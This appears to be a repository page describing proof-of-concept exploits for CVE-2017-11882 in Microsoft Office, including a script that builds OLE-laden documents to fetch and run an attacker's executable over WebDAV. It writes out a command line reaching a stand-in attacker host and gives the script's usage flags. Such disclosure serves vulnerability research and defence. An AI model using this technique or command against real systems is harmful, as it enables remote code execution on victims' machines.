by embedi

Proof-of-Concept exploits for CVE-2017-11882

471 Stars 199 Forks Last release: Not found 3 Commits 0 Releases

Available items

No Items, yet!

The developer of this repository has not created any items for sale yet. Need a bug fixed? Help with integration? A different license? Create a request here:



MITRE CVE-2017-11882:


Patch analysis:

DEMO PoC exploitation:

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff

Attacker controlled binary path should be a UNC network path:


Usage -u trigger_unc_path -e executable_unc_path -o output_file_name

Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.